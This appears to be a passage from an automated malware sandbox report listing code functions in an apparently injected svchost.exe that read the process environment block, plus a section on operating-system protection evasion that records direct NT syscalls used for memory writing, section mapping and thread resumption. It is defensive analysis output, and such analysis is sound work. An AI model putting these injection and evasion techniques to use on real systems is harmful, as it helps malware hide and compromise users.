                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039365D0 mov eax, dword ptr fs:[00000030h]7_2_039365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396A5D0 mov eax, dword ptr fs:[00000030h]7_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396A5D0 mov eax, dword ptr fs:[00000030h]7_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396E5CF mov eax, dword ptr fs:[00000030h]7_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396E5CF mov eax, dword ptr fs:[00000030h]7_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E5E7 mov eax, dword ptr fs:[00000030h]7_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E5E7 mov eax, dword ptr fs:[00000030h]7_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E5E7 mov eax, dword ptr fs:[00000030h]7_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E5E7 mov eax, dword ptr fs:[00000030h]7_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E5E7 mov eax, dword ptr fs:[00000030h]7_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E5E7 mov eax, dword ptr fs:[00000030h]7_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E5E7 mov eax, dword ptr fs:[00000030h]7_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E5E7 mov eax, dword ptr fs:[00000030h]7_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039325E0 mov eax, dword ptr fs:[00000030h]7_2_039325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396C5ED mov eax, dword ptr fs:[00000030h]7_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396C5ED mov eax, dword ptr fs:[00000030h]7_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039C6500 mov eax, dword ptr fs:[00000030h]7_2_039C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A04500 mov eax, dword ptr fs:[00000030h]7_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A04500 mov eax, dword ptr fs:[00000030h]7_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A04500 mov eax, dword ptr fs:[00000030h]7_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A04500 mov eax, dword ptr fs:[00000030h]7_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A04500 mov eax, dword ptr fs:[00000030h]7_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A04500 mov eax, dword ptr fs:[00000030h]7_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A04500 mov eax, dword ptr fs:[00000030h]7_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940535 mov eax, dword ptr fs:[00000030h]7_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940535 mov eax, dword ptr fs:[00000030h]7_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940535 mov eax, dword ptr fs:[00000030h]7_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940535 mov eax, dword ptr fs:[00000030h]7_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940535 mov eax, dword ptr fs:[00000030h]7_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940535 mov eax, dword ptr fs:[00000030h]7_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E53E mov eax, dword ptr fs:[00000030h]7_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E53E mov eax, dword ptr fs:[00000030h]7_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E53E mov eax, dword ptr fs:[00000030h]7_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E53E mov eax, dword ptr fs:[00000030h]7_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E53E mov eax, dword ptr fs:[00000030h]7_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03938550 mov eax, dword ptr fs:[00000030h]7_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03938550 mov eax, dword ptr fs:[00000030h]7_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396656A mov eax, dword ptr fs:[00000030h]7_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396656A mov eax, dword ptr fs:[00000030h]7_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396656A mov eax, dword ptr fs:[00000030h]7_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039EA49A mov eax, dword ptr fs:[00000030h]7_2_039EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039644B0 mov ecx, dword ptr fs:[00000030h]7_2_039644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039BA4B0 mov eax, dword ptr fs:[00000030h]7_2_039BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039364AB mov eax, dword ptr fs:[00000030h]7_2_039364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039304E5 mov ecx, dword ptr fs:[00000030h]7_2_039304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03968402 mov eax, dword ptr fs:[00000030h]7_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03968402 mov eax, dword ptr fs:[00000030h]7_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03968402 mov eax, dword ptr fs:[00000030h]7_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396A430 mov eax, dword ptr fs:[00000030h]7_2_0396A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392E420 mov eax, dword ptr fs:[00000030h]7_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392E420 mov eax, dword ptr fs:[00000030h]7_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392E420 mov eax, dword ptr fs:[00000030h]7_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392C427 mov eax, dword ptr fs:[00000030h]7_2_0392C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B6420 mov eax, dword ptr fs:[00000030h]7_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B6420 mov eax, dword ptr fs:[00000030h]7_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B6420 mov eax, dword ptr fs:[00000030h]7_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B6420 mov eax, dword ptr fs:[00000030h]7_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B6420 mov eax, dword ptr fs:[00000030h]7_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B6420 mov eax, dword ptr fs:[00000030h]7_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B6420 mov eax, dword ptr fs:[00000030h]7_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039EA456 mov eax, dword ptr fs:[00000030h]7_2_039EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392645D mov eax, dword ptr fs:[00000030h]7_2_0392645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395245A mov eax, dword ptr fs:[00000030h]7_2_0395245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396E443 mov eax, dword ptr fs:[00000030h]7_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396E443 mov eax, dword ptr fs:[00000030h]7_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396E443 mov eax, dword ptr fs:[00000030h]7_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396E443 mov eax, dword ptr fs:[00000030h]7_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396E443 mov eax, dword ptr fs:[00000030h]7_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396E443 mov eax, dword ptr fs:[00000030h]7_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396E443 mov eax, dword ptr fs:[00000030h]7_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396E443 mov eax, dword ptr fs:[00000030h]7_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395A470 mov eax, dword ptr fs:[00000030h]7_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395A470 mov eax, dword ptr fs:[00000030h]7_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395A470 mov eax, dword ptr fs:[00000030h]7_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039BC460 mov ecx, dword ptr fs:[00000030h]7_2_039BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940BBE mov eax, dword ptr fs:[00000030h]7_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03940BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039E4BB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039E4BB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039DEBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03950BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03950BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03950BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03930BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03930BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03930BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03938BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03938BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03938BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0395EBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039BCBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03A04B00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0395EB20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0395EB20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039F8B28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039F8B28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03928B50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039DEB50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039E4B4B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039E4B4B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039C6B40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039C6B40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039FAB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039D8B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0392CB7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03A02B57 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03A02B57 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03A02B57 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03A02B57 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03968A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0393EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0393EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0393EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0393EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0393EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0393EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0393EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0393EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0393EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03A04A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03938AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03938AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03986AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03930AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03964AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03964AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03986ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03986ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03986ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0396AAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0396AAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039BCA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03954A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03954A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0396CA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0396CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0395EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03936A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03936A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03936A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03936A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03936A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03936A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03936A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03940A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03940A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039ACA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039ACA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0396CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0396CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0396CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039DEA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039B89B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039B89B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039B89B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0393A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0393A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0393A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0393A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0393A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0393A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039FA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039C69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039629F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039629F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039BE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039BC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03928918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03928918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039AE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039AE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039B892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039C892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039B0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03A04940 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039D4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039D4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039BC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03956962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03956962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03956962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0397096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0397096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0397096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039BC89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03930887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0395E8C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03A008C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0396C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0396C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039FA8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_039BC810 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03952835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03952835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03952835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\01152-11-12-24.exe | Code function: 0_2_009480A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
                Source: C:\Users\user\Desktop\01152-11-12-24.exe | Code function: 0_2_0091A124 SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\01152-11-12-24.exe | Code function: 0_2_0091A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtWriteVirtualMemory: Direct from: 0x77762E3C
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtMapViewOfSection: Direct from: 0x77762D1C
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtNotifyChangeKey: Direct from: 0x77763C2C
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtCreateMutant: Direct from: 0x777635CC
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtResumeThread: Direct from: 0x777636AC
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtQuerySystemInformation: Direct from: 0x77762DFC
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtAllocateVirtualMemory: Direct from: 0x77762BFC
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtReadFile: Direct from: 0x77762ADC
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe | NtDelayExecution: Direct from: 0x77762DDC
